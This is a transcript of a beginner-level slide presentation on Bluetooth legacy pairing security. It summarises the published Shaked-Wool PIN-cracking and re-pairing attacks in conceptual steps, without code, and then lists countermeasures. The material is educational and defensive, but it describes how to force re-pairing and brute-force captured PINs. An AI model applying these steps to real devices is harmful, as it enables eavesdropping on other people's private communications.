Bluetooth Hacking: Cracking the PIN and Repairing Attack
21
By Rajeev Chauhan By Rajeev Chauhan http://www.cysectips.blogspot.in http://www.cysectips.blogspot.in https://www.facebook.com/cyberoxen https://www.facebook.com/cyberoxen http://cyberoxen.com http://cyberoxen.com Bluetooth Security Bluetooth Security Step by Step Analysis Step by Step Analysis cyberoxen
-
Upload
aar-cee -
Category
Technology
-
view
399 -
download
1
description
Cracking the PIN, Repairing Attack on Bluetooth devices Explained in simplistic manner. suitable for beginners as well as experts in field of Cyber Security and Bluetooth Technology.
Transcript of Bluetooth Hacking: Cracking the PIN and Repairing Attack
By Rajeev ChauhanBy Rajeev Chauhan
http://www.cysectips.blogspot.inhttp://www.cysectips.blogspot.inhttps://www.facebook.com/cyberoxenhttps://www.facebook.com/cyberoxen
http://cyberoxen.comhttp://cyberoxen.com
Bluetooth SecurityBluetooth Security
Step by Step AnalysisStep by Step Analysiscyberoxen
Bluetooth SecurityBluetooth Security
● Depends on pair codes to establish Depends on pair codes to establish the BT Communicationthe BT Communication..
● Pin cracked.......aim achieved.Pin cracked.......aim achieved.● SourceSource Cracking the Bluetooth PinCracking the Bluetooth Pin byby
Yaniv ShakedYaniv Shaked andand Avishai Wool. Avishai Wool.cyberoxen
Bluetooth ConnectivityBluetooth Connectivity
● Basic TriviaBasic Trivia::– PIN: Personal Identification NumberPIN: Personal Identification Number. .
● The PIN code is 1-8 bytes long (8-128 bits). The PIN code is 1-8 bytes long (8-128 bits). ● Most devices use PIN sizes of 4 decimal digits. Most devices use PIN sizes of 4 decimal digits.
– BD_ADDRBD_ADDR :Each Bluetooth device has a 48 bit :Each Bluetooth device has a 48 bit unique address that is called the Bluetooth Device unique address that is called the Bluetooth Device Address. Address.
– Pairing :Pairing :The process in which two (or more) Bluetooth The process in which two (or more) Bluetooth devices hook up to create a shared secret value devices hook up to create a shared secret value called K_init. The K_init forms the basis for all future called K_init. The K_init forms the basis for all future Bluetooth negotiations between these two devicesBluetooth negotiations between these two devices.
cyberoxen
Image ref http://www.hudo.com/joke/men-women-bluetooth-and-wi-fi/
cyberoxen
Bluetooth Pairing and Bluetooth Pairing and AuthenticationAuthentication
● It involvesIt involves– Creation of Intialisation key (KCreation of Intialisation key (K_init_init).).– Creation of Link Key (KCreation of Link Key (K_ab_ab).).– Authentication.Authentication.– Derive Encryption Key for Derive Encryption Key for
communication.communication.
cyberoxen
Creation of K_Creation of K_initinit
The K_init key is created The K_init key is created using the E22 algorithm, using the E22 algorithm, whose inputs are:whose inputs are:
● BD_ADDR.BD_ADDR.● The PIN code and its The PIN code and its
length.length.● a 128 bit random a 128 bit random
number IN_RAND.number IN_RAND.(transmitted in plain txt)(transmitted in plain txt)
● This algorithm outputs a This algorithm outputs a 128 bit word, which is 128 bit word, which is referred to as the referred to as the initialization key (Kinit). initialization key (Kinit).
Fig ref: http://www.eng.tau.ac.il/~yash/shaked-wool-mobisys05/
cyberoxen
Creation of KCreation of K__abab● Using the E21 algorithm, both Using the E21 algorithm, both
devices create the link key Kdevices create the link key K_ab_ab. . The inputs of E21 algorithm are:The inputs of E21 algorithm are:
1. 1. An BD_ADDR An BD_ADDR..2.2. The 128 bit random number The 128 bit random number
LK_RAND.LK_RAND.
● The devices use the initialization The devices use the initialization key to exchange two new 128 bit key to exchange two new 128 bit random words, known as random words, known as LK_RANDLK_RANDAA and LK_RAND and LK_RANDB.B.
● Each device selects a random Each device selects a random 128 bit word and sends it to the 128 bit word and sends it to the other device after bitwise x-oring other device after bitwise x-oring it with Kit with K_init._init.
Fig ref: http://www.eng.tau.ac.il/~yash/shaked-wool-mobisys05/
cyberoxen
Mutual Authentication Mutual Authentication ● The inputs to E1 are:The inputs to E1 are: 1. The random word AU_RAND1. The random word AU_RANDAA.. 2. The link key K2. The link key K_ab_ab.. 3. Its own Bluetooth device address 3. Its own Bluetooth device address
(BD_ADDR (BD_ADDRBB).).● This process is based on a challenge-This process is based on a challenge-
response scheme.response scheme.● One of the devices, the verifier, randomizes One of the devices, the verifier, randomizes
and sends (in plaintext) a 128 bit word and sends (in plaintext) a 128 bit word called AU_RANDcalled AU_RANDA A and other one, the and other one, the claimant, sends AU_RANDclaimant, sends AU_RANDB.B.
● The claimant, calculates a 32 bit word The claimant, calculates a 32 bit word called SRES using an algorithm E1. The called SRES using an algorithm E1. The claimant sends the 32 bit SRES word as a claimant sends the 32 bit SRES word as a reply to the verifier, who verifies (by reply to the verifier, who verifies (by performing the same calculations) the performing the same calculations) the response word. response word.
● This process is done at both the ends.This process is done at both the ends.● As a side effect of the authentication As a side effect of the authentication
process, a 96 bit word called ACO is process, a 96 bit word called ACO is calculated by both peers which is used calculated by both peers which is used during the creation of the encryption key.during the creation of the encryption key. Fig ref: http://www.eng.tau.ac.il/~yash/shaked-wool-
mobisys05/
cyberoxen
Bluetooth PIN CrackingBluetooth PIN Cracking
● Messages sent during the pairing and authentication process!!!!!!!!Messages sent during the pairing and authentication process!!!!!!!!
Fig ref: http://www.eng.tau.ac.il/~yash/shaked-wool-mobisys05/
cyberoxen
Bluetooth PIN CrackingBluetooth PIN Cracking
● Eavesdropped the complete Eavesdropped the complete process.process.
● Messages recorded.Messages recorded.● Attacker enumerates all Attacker enumerates all
possible values of the PINpossible values of the PIN..● The attacker runs E22 with inputs The attacker runs E22 with inputs
IN_RAND and the BD_ADDR, the IN_RAND and the BD_ADDR, the guessed PIN, and finds a guessed PIN, and finds a hypothesis for K_init, to decode hypothesis for K_init, to decode messages 2 and 3.messages 2 and 3.
● Messages 2 and 3 contain enough Messages 2 and 3 contain enough information to give the attacker an information to give the attacker an hypothesis of K_ab.hypothesis of K_ab.
● Using K_ab and the transmitted Using K_ab and the transmitted AU_RANDA (message 4), the AU_RANDA (message 4), the attacker calculates SRES and attacker calculates SRES and compares it to the data of compares it to the data of message 5.message 5.
● The attacker can use the value of The attacker can use the value of messages 6 and 7 to re-verify the messages 6 and 7 to re-verify the hypothesis K_ab until the correct hypothesis K_ab until the correct PIN is found.PIN is found.
Fig ref: http://www.eng.tau.ac.il/~yash/shaked-wool-mobisys05/
cyberoxen
Brute Force Algorithm Brute Force Algorithm
Fig ref: http://www.eng.tau.ac.il/~yash/shaked-wool-mobisys05/
cyberoxen
Bluetooth PIN CrackingBluetooth PIN Cracking
● Only fully successful against PIN Only fully successful against PIN values of under 64 bits.values of under 64 bits.
● If the PIN is longer, then with high If the PIN is longer, then with high probability there will be multiple probability there will be multiple PIN candidates, since the two PIN candidates, since the two SRES values only provide 64 bits SRES values only provide 64 bits of data .of data .
● A 64 bit PIN is equivalent to a 19 A 64 bit PIN is equivalent to a 19 decimal digits PIN.decimal digits PIN.
● The Bluetooth pairing and The Bluetooth pairing and authentication process uses three authentication process uses three algorithms: E22, E21, E1. algorithms: E22, E21, E1.
● All of these algorithms are based All of these algorithms are based on the SAFER+ cipher.on the SAFER+ cipher.
Fig ref: http://www.eng.tau.ac.il/~yash/shaked-wool-mobisys05/
cyberoxen
The Re-Pairing attackThe Re-Pairing attack
● AssumptionsAssumptions::– Both the devices are already paired once.Both the devices are already paired once.– Pairing process completed.Pairing process completed.– Link Key K_ab stored in each deviceLink Key K_ab stored in each device..– Attacker to record all the messages and Attacker to record all the messages and
crack the PIN using the Basic attackcrack the PIN using the Basic attack.– Proceed directly to the Authentication Proceed directly to the Authentication
phasephase .
– Force the devices to repeat the pairing Force the devices to repeat the pairing process.process.
– Bluetooth specifications allow a Bluetooth Bluetooth specifications allow a Bluetooth device to forget a link key on repairing.device to forget a link key on repairing. .
cyberoxen
The Re-Pairing attackThe Re-Pairing attack
● Three different Approaches.Three different Approaches.● First MethodFirst Method::
– The master device sends the slave an The master device sends the slave an AU_RANDAU_RAND message, and expects the message, and expects the SRESSRES message in return. message in return.
– (The slave sends an (The slave sends an “LMP_not_accepted“LMP_not_accepted“ “ message in return, to let the master know message in return, to let the master know it has forgotten the link key.)it has forgotten the link key.)
– The attacker injects a The attacker injects a LMP_not_acceptedLMP_not_accepted message toward the master. This will message toward the master. This will make the master re-initiate the paring.make the master re-initiate the paring.
– Restarting the pairing procedure causes Restarting the pairing procedure causes the master to discard the link key.the master to discard the link key.
cyberoxen
The Re-Pairing attackThe Re-Pairing attack
● Second Method:Second Method:– Before the master device Before the master device
sends the slave an sends the slave an AU_RANDAU_RAND message, message, the the attacker injects a attacker injects a IN_RANDIN_RAND message toward the slave,message toward the slave,
– The slave device will be The slave device will be convinced the master has convinced the master has lost the link key and pairing is lost the link key and pairing is restarted. restarted.
– This will cause the This will cause the connection establishment to connection establishment to restart.restart.
cyberoxen
The Re-Pairing attackThe Re-Pairing attack
● Third MethodThird Method : :
– After Master has sent the After Master has sent the AU_RAND, AU_RAND, An attacker An attacker injects a random SRES injects a random SRES message toward the master.message toward the master.
– This causes the This causes the Authentication phase to Authentication phase to restart, and repeated restart, and repeated attempts will be made.attempts will be made.
– At some point, after a certain At some point, after a certain number of failed number of failed authentication attempts, the authentication attempts, the master device is expected to master device is expected to declare that the declare that the authentication procedure has authentication procedure has failed and initiate pairing.failed and initiate pairing.
cyberoxen
The Re-Pairing attackThe Re-Pairing attack
● CulminationCulmination::– This assures the pairing process will occur during the next This assures the pairing process will occur during the next
connection establishment, so the attacker will be able to connection establishment, so the attacker will be able to eavesdrop on the entire process, and use the basic method eavesdrop on the entire process, and use the basic method to crack the PIN.to crack the PIN.
– After breaking the PIN (0.06-0.3 sec for a 4 digit PIN), the After breaking the PIN (0.06-0.3 sec for a 4 digit PIN), the attacker can decode the saved messages, and continue to attacker can decode the saved messages, and continue to eavesdrop and decode the communication on the fly. eavesdrop and decode the communication on the fly.
– Since Bluetooth supports a bit rate of 1 Megabit per second, Since Bluetooth supports a bit rate of 1 Megabit per second, a 40KB buffer is more than enough for the common case of a 40KB buffer is more than enough for the common case of a 4 digit PIN. a 4 digit PIN.
cyberoxen
CountermeasuresCountermeasures
● Refrain from entering the PIN into the Bluetooth device for Refrain from entering the PIN into the Bluetooth device for pairing as much as possible.pairing as much as possible.
● Use PIN longer than 6 digits.Use PIN longer than 6 digits.
● The PIN length ranges from 8 to 128 bits. Should ask for The PIN length ranges from 8 to 128 bits. Should ask for longer bit lenghts.longer bit lenghts.
● Set Bluetooth device in “non-discoverable mode/hidden Set Bluetooth device in “non-discoverable mode/hidden mode”.mode”.
● Application level security in addition to BT authentication.... Application level security in addition to BT authentication.... ie password.ie password.
cyberoxen
CountermeasuresCountermeasures
● Use the strongest Bluetooth security Use the strongest Bluetooth security mode available on the device. mode available on the device.
● Avoid use of standard commercial Avoid use of standard commercial Bluetooth headsets. Bluetooth headsets.
● Disable Bluetooth functionality when Disable Bluetooth functionality when not in use. Use shorter range Class 2 not in use. Use shorter range Class 2 or 3 devices. or 3 devices.
● Make devices discoverable only Make devices discoverable only when necessary. when necessary.
● Pair Bluetooth devices in a secure Pair Bluetooth devices in a secure area using long and randomly area using long and randomly generated passkeys.generated passkeys.
● Never enter passkeys when Never enter passkeys when unexpectedly prompted for them. unexpectedly prompted for them. Maintain physical control of devices Maintain physical control of devices at all times.at all times.
● Remove lost or stolen devices from Remove lost or stolen devices from paired device lists. paired device lists.
● Use device firewalls, regularly patch Use device firewalls, regularly patch Bluetooth devices, and keep device Bluetooth devices, and keep device anti-virus software up to date.anti-virus software up to date.
cyberoxen
INFORMATION SOURCESINFORMATION SOURCES
● http://www.mysecurecyberspace.com/encyclopediahttp://www.mysecurecyberspace.com/encyclopedia/index/pin-cracking.html/index/pin-cracking.html
● http://www.eng.tau.ac.il/~yash/shaked-wool-mobihttp://www.eng.tau.ac.il/~yash/shaked-wool-mobisys05/sys05/
● https://www.sans.org/reading-room/whitepapers/wihttps://www.sans.org/reading-room/whitepapers/wireless/bluetooth-inherent-security-issues-945reless/bluetooth-inherent-security-issues-945
● http://pervasive.cs.uah.edu/PSP/BluetoothSechttp://pervasive.cs.uah.edu/PSP/BluetoothSecurityurity
● http://www.techradar.com/news/networking/bluetoohttp://www.techradar.com/news/networking/bluetooth-jumps-to-4-1-makes-an-early-leap-for-the-inteth-jumps-to-4-1-makes-an-early-leap-for-the-internet-of-things-1204915rnet-of-things-1204915
cyberoxen
cyberoxen
